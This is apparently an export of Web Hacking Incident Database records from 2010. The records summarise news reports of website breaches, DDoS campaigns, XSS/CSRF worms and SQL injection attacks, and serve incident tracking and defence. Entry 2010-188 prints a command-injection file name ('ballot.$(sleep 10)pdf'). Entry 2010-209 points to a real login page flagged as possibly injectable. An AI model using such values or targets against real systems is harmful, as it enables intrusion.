Entry Title: WHID 2010-209: Hacker may have accessed DHH database
WHID ID: 2010-209
Date Occured: 9/17/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Baton Rouge, LA
Incident Description: Department of Health and Hospitals spokeswoman Lisa Faust said Bureau of Emergency Medical Services personnel discovered the database breach. The unauthorized entry gave the hacker access to an individual’s name and personal information, including Social Security numbers. “What we don’t know is whether the hacker was able to access any information,” Faust said. A computer screen displayed the message “You have been hacked,” Faust said. “Since we don’t know one way or the other we sent notices out to 56,000 people that there’s a potential that the information was compromised.” WASC WHID Note - the portal login page (https://ems.oph.dhh.la.gov/ems/login.asp) looks vulnerable to SQL Injection
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.2theadvocate.com/news/105946193.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-208: BoingBoing hacked and defaced
WHID ID: 2010-208
Date Occured: 10/27/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Blogs
Attacked Entity Geography: Toronto, CA
Incident Description: BoingBoing.net, the popular blog and "directory of wonderful things", has been hacked and its home page replaced with a message containing vulgar language and pictures. The site was pulled down by the administrators shortly after the attack, which is suspected to have been executed via an SQL injection, TechCrunch reports.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.net-security.org/secworld.php?id=10062
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-207: MWEB gets hacked
WHID ID: 2010-207
Date Occured: 10/25/2010
Attack Method: Unknown
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Hosting Providers
Attacked Entity Geography: Lusaka, South Africa
Incident Description: The login details of over 2000 MWEB Business account-holders has been published online by a hacker. The hacker published details such as usernames, passwords, line speeds and subscriber names on a mailing list archive, MyBroadband reported. Affected companies include Bloomberg, Volvo SA, Caledon Hotel Casino, Peugeot SA and Radio 786. UPDATE: According to MWEB's Twitter account, less than a 1000 accounts have been affected. The ISP also said that the problem was with the Internet Solutions user interface.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://technology.iafrica.com/technews/682038.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-206: Tribal rights charity weathers DDoS assault
WHID ID: 2010-206
Date Occured: 10/28/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography:
Incident Description: The publication of footage of Indonesian soldiers torturing native Papuans appears to provoked a denial of service attack on the websites of development charities who hosted it. The websites of Survival International and at least five other organisations who work in West Papua were all floored by the attack, which started at around 5pm on Wednesday and increased in severity over the evening. Survival's site is currently back up even though the assault remains ongoing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/28/survival_ddos_assault/
Attack Source Geography: London, England
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-205: Hackers plant Firefox 0day on Nobel Peace Prize website
WHID ID: 2010-205
Date Occured: 10/27/2010
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Education
Attacked Entity Geography: Norway
Incident Description: Malicious hackers have exploited an unpatched vulnerability in the latest version of Firefox to attack people visiting the Nobel Peace Prize website, a Norway-based security firm said on Tuesday.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/26/firefox_0day_report/
Attack Source Geography: Taiwan
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-204: How bank hackers beat Barclays
WHID ID: 2010-204
Date Occured: 10/25/2010
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Fraud
Attacked Entity Field: Finance
Attacked Entity Geography: London, England
Incident Description: The Barclays hack The Barclays hackers used their zero-day attack (or hack) to get round the security gate timers the bank's engineers had put in its website software. It was the hacking equivalent of sitting outside the bank in a Ford Cortina, and checking your watch every time the rent-a-cop does his rounds and the bank manager pops out for his lunch-time massage. Barclays thought it was prepared for this sort of reconnaissance, said Romain. The bank's security team had reviewed the software behind its website payment system and got everything ship-shape. They checked how their banking software handled internet transactions. Real people tend to fumble and faff about at their computers. It can take some old timers half a day just to enter their card number. Yet automated software bots designed by hackers can spit out instructions as fast as the bank computer will receive them. Software like this pretends to be a bank customer, but is far too efficient to be a real person at all.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.thinq.co.uk/2010/10/25/how-bank-hackers-beat-barclays/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-203: Confessed student hacker speaks
WHID ID: 2010-203
Date Occured: 10/25/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: London, Ontario, CA
Incident Description: HOW HE SAYS HE HACKED THE SYSTEM An SQL database system is used to store information, such as passwords. Using an "SQL injection," he was able to log onto the site as an administrator. From there, he was able to upload files and to get the log-in information. "It let me see all the files on the servers, passwords, user names. They did not make any effort to hide it," he said of the school board's IT department.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.woodstocksentinelreview.com/ArticleDisplay.aspx?e=2815263
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-202: NASA Website hacked and serving malware/spam
WHID ID: 2010-202
Date Occured: 10/21/2010
Attack Method: Unknown
Application Weakness: Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: Phoenix, AZ
Incident Description: Some sites under NASA’s Jet Propulsion lab ( http://jpl.nasa.gov/ ) have been hacked and are being used on the infamous blackhat SEO Spam network. Not only that, but they are also serving malware to unsuspicious users.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/10/nasa-web-site-hacked-and-serving-malwarespam.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-201: Operation: Payback Hits SatelFilm.at with 'Drive By' DoS
WHID ID: 2010-201
Date Occured: 10/21/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Wien, Austria
Incident Description: Operation: Payback apparently went on a preemptive strike, taking Satel Film by surprise and launching a 'drive by' DDoS (Distributed Denial of Service) attack. As of this writing, SatelFilm.at is offline.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected: 1
Reference: http://www.slyck.com/story2097_Operation_Payback_Hits_SatelFilmat_with_Drive_By_DoS
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-200: Wikileaks Communications Infrastructure Attacked?
WHID ID: 2010-200
Date Occured: 10/21/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: News
Attacked Entity Geography: San Mateo, CA
Incident Description: According to sources in the hacking circuit familiar with the goings-on of Wikileaks, the organization is adopting a new server cluster to replace those that have come under the denial-of-service attack. The security breaches were not connected to the site restructuring that has brought it down for about two weeks, said a Wikileaks volunteer. Because the organization's staff members operate on the policy of "security through obscurity," insiders were not clear about the magnitude of or the parties behind the attack.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://cybersecurityreport.nextgov.com/2010/10/wikileaks_communications_infrastructure_attacked.php?oref=latest_posts
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-199: Cyber Attack Strikes FreedomWorks
WHID ID: 2010-199
Date Occured: 10/21/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Politics
Attacked Entity Geography: Washington, DC
Incident Description: A mysterious cyber attack apparently struck the computer servers at the pro-tea party group FreedomWorks this morning, just as it launched a major fund-raising drive. FreedomWorks officials are investigating, but they suspect they were attacked deliberately, perhaps by a political opponent seeking the thwart its fund-raising efforts. The attack crippled the site at about 9:45 a.m. just when the fund-raising drive was publicized on the radio by conservative talk show host Glenn Beck. The group estimates it lost about $80,000 in potential donations as it struggled to bring its site back online. An “autopsy” showed a highly sophisticated hacker struck at 6:55 a.m., the group said, setting the stage for the eventual meltdown. The server was wiped out, though group officials said no data was lost or stolen.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.wsj.com/washwire/2010/10/21/cyber-attack-strikes-freedomworks/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-198: Kaspersky download site hacked, redirecting users to fake AV
WHID ID: 2010-198
Date Occured: 10/17/2010
Attack Method: Known Vulnerability
Application Weakness: Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Technology
Attacked Entity Geography: Moscow, Russia
Incident Description: According to ITPro, the incident was first denied, then confirmed by Kaspersky. They say that they took the server offline as soon as they found out about the breach, that the compromise was caused by a vulnerability in a third party application for website administration and that customer details contained on company servers were not compromised.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.net-security.org/malware_news.php?id=1499
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-197: AmeriCorps Security Breach
WHID ID: 2010-197
Date Occured: 10/8/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Washington, DC
Incident Description: In order for personal data to have been exposed, someone would have had to manipulate the website address -- or know the individual's unique log-in name and use a certain technique to bypass password requirements, the letter said. The records may have shown names, addresses and social security numbers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://wiredworkplace.nextgov.com/2010/10/americorps_workers_personal_data_jeopardized-print.php
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-196: HK star Dicky Cheung's blog hacked
WHID ID: 2010-196
Date Occured: 10/19/2010
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Password Recovery
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: Hong Kong
Incident Description: Even when the hoax was exposed, the hacker continued to boldly state in a post that he hacked Cheung's blog to test his skills. He claimed that "it took only a short while to retrieve a user's login information" before apologising for the matter and vanishing.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.channelnewsasia.com/stories/entertainment/view/1087981/1/.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-195: Anonymous DDoS on Gene Simmons' websites
WHID ID: 2010-195
Date Occured: 10/12/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Beverly Hills, CA
Incident Description: Gene Simmons, frontman of the band KISS, is hardly impressed with the DDoS (Distributed Denial of Service) attack on GeneSimmons.com - and indirectly - SimmonsRecords.com. In fact, according to a news post made to his site yesterday, Gene is threatening legal action against the perpetrators, along with posting their names and pictures online.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.slyck.com/story2088_Gene_Simmons_Directly_Threatens_Anonymous_With_Legal_Action_Jail_Time
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-194: Liberal Democrats website hijacked by tuition fees message
WHID ID: 2010-194
Date Occured: 10/18/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: UK
Incident Description: The website for the Liberal Democrats was hacked at the end of last week, with the front page redirecting to a YouTube protest about tuition fees.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.scmagazineuk.com/liberal-democrats-website-hijacked-by-tuition-fees-message/article/181149/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-193: IPO.gov.uk - Less than an Hour Until Attack Begins
WHID ID: 2010-193
Date Occured: 10/16/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: UK
Incident Description: So now the target of Anonymous is the IPO.gov.uk website - or the Intellectual Property Office. This is the first time Anonymous has targeted a government website, indicating a level of fearlessness considering the possible ramifications. As its name suggests, the IPO governs and helps protect copyrights and intellectual property in the United Kingdom.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.slyck.com/story2087_IPOgovuk_Less_than_an_Hour_Until_Attack_Begins
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-192: SQL Injection Used to Deface Copyprotected, Others Might Follow
WHID ID: 2010-192
Date Occured: 10/16/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: However, Sean-Paul Correll of Panda Security, doesn't agree with the "DNS cache poisoning" theory. According to him, the attack vector was SQL injection. "The original researcher assumed that the host of the hijacked site was not affiliated with the MPAA website,  but we can see that the reported IP is hosting other MPAA related websites [cptwg.org, filmratings.com]," the researcher writes. Correll even points out exactly where the exploited SQL injection weakness was located and calls the flaw "rudimentary."
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://news.softpedia.com/news/SQL-Injection-Used-to-Deface-Copyprotected-Others-Might-Follow-161316.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-191: XSS Flaw Found on Secure American Express Site
WHID ID: 2010-191
Date Occured: 10/5/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Credit Card Issuer
Attacked Entity Geography: USA
Incident Description: A cross-site scripting (XSS) vulnerability has been identified on an American Express website secured with EV SSL and can be exploited to enhance phishing attacks. XSS weaknesses are the result of poor input validation into Web forms and allow attackers to return potentially malicious code to visitors' browsers. Ensuring proper validation of all inputs in Web applications, in order to prevent cross-site scripting and SQL injection vulnerabilities, is actually a requirement of the Payment Card Industry Data Security Standard (PCI-DSS).
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/XSS-Flaw-Found-on-Secure-American-Express-Site-159439.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-190: PayPal and eBay XSSed Again
WHID ID: 2010-190
Date Occured: 10/6/2010
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: New cross-site scripting (XSS) vulnerabilities, that can be leveraged to create very credible phishing attacks, have been identified on PayPal and eBay. The PayPal XSS weakness was discovered by a Romanian security enthusiast using the online handle of d3v1l, who disclosed it on his blog.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/eBay-and-PayPal-XSSed-Again-159733.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://blogs.forbes.com/firewall/2010/10/06/hackable-bug-found-on-paypal-com/?partner=yahootix
Entry Title: WHID 2010-189: Copyright holder floored by DDoS flood
WHID ID: 2010-189
Date Occured: 10/7/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography: Spain
Incident Description: Spain's copyright society (SGAE) came under attack by hacktivists from Anonymous on Thursday as part of the latest phase of a high-profile campaign against organisations that hassle file-sharers. A distributed denial of service attack, officially launched at midnight (Central European Time) on 7 October , crashed the organisation's website on Wednesday even before it even officially began. The assault is a repeat of tactics previously used against the websites of Recording Industry Association of America (RIAA), the Motion Picture Association of America (MPAA) and UK law firm ACS:Law, among others.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/07/anonymous_ent_biz_ddos_hits_spain/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-188: Hackers hijack internet voting system in Washington DC
WHID ID: 2010-188
Date Occured: 10/6/2010
Attack Method: OS Commanding
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: The voting application was written on the Ruby on Rails framework and ran on top of the Apache web server and the MySQL database. The scientists were able to hijack the system after they discovered that they could upload ballots with almost any string they wanted. By inserting Unix commands into the file names, they were able to take “almost total control of the server software, including the ability to change votes and reveal voters' secret ballots,” Halderman said. A file named “ballot.$(sleep 10)pdf,” for instance, caused the server to pause for 10 seconds. They used similar techniques to install a backdoor on the system that allowed them almost unfettered system access.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/10/06/net_voting_hacked/
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-187: "Operation Payback" attacks to go on until "we stop being angry"
WHID ID: 2010-187
Date Occured: 9/30/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: The distributed denial of service (DDoS) attacks against anti-piracy websites have gone on for a week now, with the lawyers behind the "US Copyright Group" being the latest target. And the anonymous Internet users behind "Operation Payback" aren't done acting out; in an interview yesterday with the security experts at Panda Labs, one of the organizers said that Anonymous' attacks will continue "until we stop being angry." Judging from the list of things that make him (?) angry, this could take a while. The law firm of Dunlap, Grubb and Weaver was one of the newest targets of the attacks, organized a week ago to take down antipiracy organization around the world. Already hit: the RIAA (US), BPI (UK), MPAA (US), AFACT (Australia), BREIN (Netherlands), Aiplex (India), and Websheriff (UK). One of the smaller sites actually yielded the biggest bounty; the UK "P2P settlement letter factory" ACS Law gave up several hundred megabytes of private e-mails after being taken offline by the attack.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://arstechnica.com/tech-policy/news/2010/09/operation-payback-attacks-continue-until-we-stop-being-angry.ars
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-186: Foursquare Hacked by TechCrunch Editor Michael Arrington
WHID ID: 2010-186
Date Occured: 10/1/2010
Attack Method: Content Spoofing
Application Weakness: Abuse of Functionality
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Becoming "mayor" of a location is the most coveted status in Foursquare. To win this honor you have to check in to a location more than anyone else, and to do that you actually have to go there, since Foursquare won't let you check in remotely. But last night Techcrunch editor Michael Arrington punked Foursquare's API and made himself mayor of Facebook and Twitter headquarters, all without ever leaving his office. "A mischievous hacker friend of mine stepped in with a small script that he wrote that will check me in to any venue at all via the Foursquare API," Arrington wrote in a post on TechCrunch. "That means I don't have to spend time finding friends already where I want to be, and since we're using the API we can easily fake out the "you're not actually there" problem."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.observer.com/print/133727
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-185: Online hackers steal $600K from city of Brigantine's bank account
WHID ID: 2010-185
Date Occured: 10/1/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: New Jersey, USA
Incident Description: Computer hackers managed to steal $600,000 from a New Jersey shore town's bank account. Officials say $200,000 still hasn't been recovered. TD Bank notified Brigantine on Tuesday that multiple wire transfers had taken place from its account. Police say someone was able to get a user name and password. Authorities say a virus or a fake Web page set up to mimic the bank's real one might have been used to carry out the thefts.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.nj.com/news/index.ssf/2010/10/online_hackers_steal_600k_from.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-184: Microsoft warns of in-the-wild attacks on web app flaw
WHID ID: 2010-184
Date Occured: 9/21/2010
Attack Method: Brute Force
Application Weakness: Information Leakage
Outcome: Leakage of Information
Attacked Entity Field: Multiple
Attacked Entity Geography:
Incident Description: Attackers have begun exploiting a recently disclosed vulnerability in Microsoft web-development applications that opens password files and other sensitive data to interception and tampering. The vulnerability in the way ASP.Net apps encrypt data was disclosed last week at the Ekoparty Conference in Argentina. Microsoft on Friday issued a temporary fix for the so-called “cryptographic padding attack,” which allows attackers to decrypt protected files by sending vulnerable systems large numbers of corrupted requests. Now, Microsoft security pros say they are seeing “limited attacks” in the wild and warned that they can be used to read and tamper with a system's most sensitive configuration files.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/09/21/asp_dot_net_padding_oracle_fix/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-183: Don't blame DNS for Facebook outage, experts say
WHID ID: 2010-183
Date Occured: 9/27/2010
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Downtime
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Facebook gave little detail about the cause of the outage except to say that it was the result of a misconfiguration in one of its databases, which prompted a flood of traffic from an automated system trying to fix the error. "We made a change to a persistent copy of a configuration value that was interpreted as invalid," explained Robert Johnson in Facebook's blog post about the incident. "This meant that every single client saw the invalid value and attempted to fix it. Because the fix involves making a query to a cluster of databases, that cluster was quickly overwhelmed by hundreds of thousands of queries per second." The feedback loop created so much traffic that Facebook was forced to turn off the database cluster, which meant turning off the Web site. "Once the databases had recovered and the root cause had been fixed, we slowly allowed more people back onto the site," Johnson said. He added that "for now we've turned off the system that attempts to correct configuration values."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2010/09/27/urnidgns002570F3005978D8002577A9007EE871.DTL
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-182: Orkut Hit by XSS Worm
WHID ID: 2010-182
Date Occured: 9/26/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: First Twitter was hacked. Then Facebook went down. Now it’s Orkut’s turn. Google’s social networking site has been attacked by the virulent “Bom Sabado” worm. Bom Sabado means “Good Saturday” in Portuguese, the native language of Brazil where the worm is thought to have originated. Orkut is the most popular social site in Brazil, India and several other countries. The worm replicates itself across accounts and randomly sends “Bom Sabado” messages to friend’s scrapbooks — Orkut’s version of Facebook’s wall. Google support recently announced that the worm had been contained and they are in the process of cleaning infected accounts. However, the company recommends vigilance when accessing accounts — users should be especially wary about clicking suspicious links.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.sitepoint.com/2010/09/26/orkut-bom-sabado-xss-worm/
Attack Source Geography:
Attacked System Technology: Orkut
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-181: Mass cyber attack paralyses Burmese media
WHID ID: 2010-181
Date Occured: 9/27/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Burma
Incident Description: Websites belonging to The Irrawaddy magazine, Mizzima and DVB – all exiled media groups founded by former activists – were today attacked using DDoS, or distributed denial-of-service, which fires thousands of malformed web connections against the site.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.dvb.no/elections/mass-cyber-attack-paralyses-burmese-media/11932
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-180: Thousands of Websites Affected by Anonymous DDoS Attack Against AFACT
WHID ID: 2010-180
Date Occured: 9/28/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Multiple
Attacked Entity Geography:
Incident Description: The Distributed Denial of Service (DDoS) attack launched by Anonymous against the Australian Federation Against Copyright Theft (AFACT) yesterday, has ended up affecting almost 8,000 unrelated websites. Operation Payback, the DDoS campaign led by Anonymous against anti-piracy groups and entertainment industry associations is now over a week old. Since September 18th, when the coordinated attacks started, the group has hit websites belonging to the Motion Picture Association of America (MPAA), the Recording Industry Association of America (RIAA), the International Federation of the Phonographic Industry (IFPI), the British Phonographic Industry (BPI) and the Dutch Bescherming Rechten Entertainment Industrie Nederland (BREIN). Two UK-based law firms and an Indian company called Aiplex Software involved in anti-piracy efforts have also been attacked
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Thousands-of-Websites-Affected-by-Anonymous-DDoS-Attack-Against-AFACT-158431.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-179: WTF worm makes Twitterers declare goat lust
WHID ID: 2010-179
Date Occured: 9/27/2010
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Worm
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Another malicious worm hit Twitter over the weekend, days after the micro-blogging site reached near-meltdown from a technically similar attack. This time around the danger came from clicking links contained in micro-blogging messages beginning "WTF [URL]". Last week's more serious onMouseOver problem struck when users moved their mouse cursor over an infected tweet. These messages contained hidden JavaScript code that exploited a cross-site scripting problem - in the case of the WTF worm a CSRF (cross-site request forgery) technique is in play. The miscreants behind the latest assault set up an attack page that exploited a CSRF vulnerability in Twitter so that victims who clicked on a link posted a crude message about their supposed fondness for sex with goats, as explained in a blog post by Sophos here.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/09/27/twitter_wtf_worm/
Attack Source Geography:
Attacked System Technology: Twitter
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-178: New Mass Injection Attack Targets ASP Websites
WHID ID: 2010-178
Date Occured: 9/29/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Multiple
Attacked Entity Geography:
Incident Description: A gang of hackers targeting infecting predominantly ASP and ASP.NET websites with malicious code, has launched a new attack that so far affected at least 1,500 domains. "A large number of sites have been hacked again in the last few days with a malware script pointing to google-stat50.info (and google-stats50.info)," David Dede of Web integrity monitoring vendor Sucuri Security, warns. "Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few months ago," he adds. The robint.us mass injection took place at the beginning of June and got a good coverage in the media because it affected the websites of the Wall Street Journal and Jerusalem Post.
Mass Attack: Yes
Mass Attack Name: Mass SQL Injection Bots
Number of Sites Affected:
Reference: http://news.softpedia.com/news/New-Mass-Injection-Attack-Targets-ASP-Websites-158499.shtml
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-177: Japan Suspects Chinese Hackers Attacked Its Official Websites
WHID ID: 2010-177
Date Occured: 9/20/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Japan
Incident Description: Japan views Chinese hackers as main suspects for Distributed Denial of Service (DDoS) attacks that affected several of its official websites last week. According to the Taipei Times, the Japanese government is investigating attacks directed at the Ministry of Defense and National Police Agency websites, between Wednesday and Friday. The largest known Chinese hacking group is suspected for launching the DDoS, because it made threats in this respect, following a recent maritime incident that led to a diplomatic conflict between the two countries.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Japan-Suspects-Chinese-Hackers-Attacked-Its-Official-Websites-157142.shtml
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-176: Cyber rally disrupts US recording industry website
WHID ID: 2010-176
Date Occured: 9/20/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: Reference WHID 2010-164: Company Paid to Launch DoS Attacks Against Torrent Sites Computer security researchers have said that an unprecedented mass cyber protest was triggered by efforts by film and music trade groups to close online piracy haunts. Members of 4chan online forum that promotes users remaining anonymous organized distributed denial-of-service (DDoS) attacks on websites for the Recording Industry Association of America (RIAA) and the Motion Picture Association of America (MPAA), according to the security firm PandaLabs. DDoS attacks are efforts to overload websites with so many simultaneous requests that computer servers can't handle the load and freeze or crash. Attacks on RIAA caused a dozens of interruptions in service, taking down the group's website for a total of one hour and 37 minutes, according to PandaLabs.
Mass Attack: Yes
Mass Attack Name: Operation Payback
Number of Sites Affected:
Reference: http://www.google.com/hostednews/afp/article/ALeqM5h7fm6cBhM33alDYD_1n4tTVHwXMw
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
